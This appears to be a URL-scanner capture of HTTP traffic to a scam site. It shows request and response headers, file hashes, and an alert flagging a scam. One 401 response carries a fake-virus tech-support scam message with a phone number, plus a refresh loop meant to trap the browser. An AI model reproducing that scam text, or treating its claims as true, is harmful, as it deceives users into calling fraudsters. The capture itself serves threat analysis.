Md5:    28d6814f309ea289f847c69cf91194c6
Sha1:   0f4e929dd5bb2564f7ab9c76338e04e292a42ace
Sha256: 8337212354871836e6763a41e615916c89bac5b3f1f0adf60ba43c7c806e1015
                                        
                                            GET /fir/security.php HTTP/1.1 
Host: bfswqrt.gq
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bfswqrt.gq/fir/
Cookie: _ga=GA1.2.1953986344.1532102476; _gid=GA1.2.1988296310.1532102476; _gat_gtag_UA_116176892_2=1

                                         
                                         50.62.22.142
HTTP/1.1 401 Unauthorized
Content-Type: text/html; charset=UTF-8
                                        
Date: Fri, 20 Jul 2018 16:01:16 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
WWW-Authenticate: Basic realm="Suspicious activity detected on your IP address due to harmful virus installed in your computer. Call Toll Free now @ +1-888-348-1617 for any assistance. Your data is at a serious risk.There is a system file missing due to some harmfull virus Debug malware error, system failure. Please contact technicians to rectify the issue.Please do not open internet browser for your security issue to avoid data corruption on your operating system. Please contact technicians at Tollfree Helpline at @ +1-888-348-1617(Toll free) PLEASE DO NOT SHUT DOWN OR RESTART YOUR COMPUTER, DOING THAT MAY LEAD TO DATA LOSS AND FAILURE OF OPERATING SYSTEM , HENCE NON BOOTABLE SITUATION RESULTING COMPLETE DATA LOSS . CONTACT ADMINISTRATOR DEPARTMENT TO RESOLVE THE ISSUE ON TOLL FREE @ +1-888-348-1617"
refresh: 0; url=/fir/security.php
Set-Cookie: PHPSESSID=fqgk3mbcqk1k8ig7g9qo2ob823; path=/
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Transfer-Encoding: chunked


--- Additional Info ---
Magic:  HTML document text
Size:   40
Md5:    54a162d53b04d31ce268a35baf244caf
Sha1:   42c48439d4f282db5d8e5e19bf0f41a03fa3f94b
Sha256: 9aeea010b6b29e828ce60611b487c718abf716fa08d2d9eb13ed3a5b0a2f51a6

Alerts:
  urlquery:
    - Scam / Cryptowall detected
                                        
                                            GET /favicon.ico HTTP/1.1 
Host: bfswqrt.gq
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: _ga=GA1.2.1953986344.1532102476; _gid=GA1.2.1988296310.1532102476; _gat_gtag_UA_116176892_2=1; PHPSESSID=fqgk3mbcqk1k8ig7g9qo2ob823

                                         
                                         50.62.22.142
HTTP/1.1 404 Not Found
Content-Type: text/html; charset=iso-8859-1
                                        
Date: Fri, 20 Jul 2018 16:01:16 GMT
Server: Apache
Content-Length: 328
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive


--- Additional Info ---
Magic:  HTML document text\012 exported SGML document text
Size:   328
Md5:    301fa7ceb5b3c291d4bbeee953048686
Sha1:   758d921efd60d4e9f0f6d77648ccc500c8611fea
Sha256: 6b62a3658ad247e8f30d3e9f35da5e00ffac1ea09785bd1f0a9830f659cf01da
                                        
                                            GET /favicon.ico HTTP/1.1 
Host: bfswqrt.gq
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: _ga=GA1.2.1953986344.1532102476; _gid=GA1.2.1988296310.1532102476; _gat_gtag_UA_116176892_2=1; PHPSESSID=fqgk3mbcqk1k8ig7g9qo2ob823

                                         
                                         50.62.22.142
HTTP/1.1 404 Not Found
Content-Type: text/html; charset=iso-8859-1
                                        
Date: Fri, 20 Jul 2018 16:01:17 GMT
Server: Apache
Content-Length: 328
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive


--- Additional Info ---
Magic:  HTML document text\012 exported SGML document text
Size:   328
Md5:    301fa7ceb5b3c291d4bbeee953048686
Sha1:   758d921efd60d4e9f0f6d77648ccc500c8611fea
Sha256: 6b62a3658ad247e8f30d3e9f35da5e00ffac1ea09785bd1f0a9830f659cf01da